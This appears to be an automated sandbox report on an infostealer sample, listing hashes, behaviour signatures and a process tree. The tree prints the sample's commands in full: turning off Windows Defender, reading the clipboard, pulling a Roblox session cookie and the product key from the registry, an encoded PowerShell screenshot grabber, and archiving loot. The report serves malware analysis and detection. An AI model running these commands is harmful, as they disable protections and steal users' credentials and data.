Analysis

  • max time kernel
    34s
  • max time network
    34s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-01-2025 14:46

General

  • Target

    Program.exe

  • Size

    7.5MB

  • MD5

    a251902a8bbbe4564fbe9bc06325e7a5

  • SHA1

    a4f0ea45b51f99df9dbcdf4d73de1744c12a5dba

  • SHA256

    790c7394a23d59216e1963197316475cd0c6b4f53c3803c65c0f8f407cdd99a9

  • SHA512

    3860976dbf69c2cd9dbcee98de59e6b28aa6ddd55aa17623fa60ed32322c335db3aa6fea3f07ac132b848648920a03ce62ec7fc4ff24957b1e2e50af192077fb

  • SSDEEP

    196608:RkunqZiwfI9jUC2XMvH8zPjweaBpZ0cX9ooccXK7odAxR:VWIH2XgHq+jq+3YoM

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Program.exe
    "C:\Users\Admin\AppData\Local\Temp\Program.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Users\Admin\AppData\Local\Temp\Program.exe
      "C:\Users\Admin\AppData\Local\Temp\Program.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4348
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Program.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Program.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2184
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4580
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2124
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1580
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1716
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:948
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1528
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4904
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:1476
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:912
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4652
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:944
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:2280
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:3596
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:5068
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2580
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:5020
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1332
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:4768
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4556
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3552
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krcqj21k\krcqj21k.cmdline"
                5⤵
                  PID:1712
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0B0.tmp" "c:\Users\Admin\AppData\Local\Temp\krcqj21k\CSCFADFC011DCBF4B16B2EF2BA52D3782C0.TMP"
                    6⤵
                      PID:4584
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2932
                • C:\Windows\system32\attrib.exe
                  attrib -r C:\Windows\System32\drivers\etc\hosts
                  4⤵
                  • Drops file in Drivers directory
                  • Views/modifies file attributes
                  PID:4444
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3720
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:2596
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4852
                  • C:\Windows\system32\attrib.exe
                    attrib +r C:\Windows\System32\drivers\etc\hosts
                    4⤵
                    • Drops file in Drivers directory
                    • Views/modifies file attributes
                    PID:3952
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:4924
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2336
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      3⤵
                        PID:4480
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          4⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1764
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:2140
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1028
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:1480
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:1576
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:3724
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:4336
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                    3⤵
                                      PID:4736
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1708
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:4116
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          4⤵
                                            PID:4924
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2316
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "getmac"
                                          3⤵
                                            PID:4508
                                            • C:\Windows\system32\getmac.exe
                                              getmac
                                              4⤵
                                                PID:4976
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI6402\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\G7aGT.zip" *"
                                              3⤵
                                                PID:2112
                                                • C:\Users\Admin\AppData\Local\Temp\_MEI6402\rar.exe
                                                  C:\Users\Admin\AppData\Local\Temp\_MEI6402\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\G7aGT.zip" *
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:4988
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                3⤵
                                                  PID:3264
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic os get Caption
                                                    4⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4420
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                  3⤵
                                                    PID:652
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic computersystem get totalphysicalmemory
                                                      4⤵
                                                        PID:4556
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      3⤵
                                                        PID:1568
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic csproduct get uuid
                                                          4⤵
                                                            PID:4384
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          3⤵
                                                            PID:2308
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2284
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            3⤵
                                                              PID:1624
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic path win32_VideoController get name
                                                                4⤵
                                                                • Detects videocard installed
                                                                PID:2472
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                              3⤵
                                                                PID:3812
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:804
                                                          • C:\Windows\System32\rundll32.exe
                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                            1⤵
                                                              PID:2644

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                              Filesize

                                                              3KB

                                                              MD5

                                                              8740e7db6a0d290c198447b1f16d5281

                                                              SHA1

                                                              ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                              SHA256

                                                              f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                              SHA512

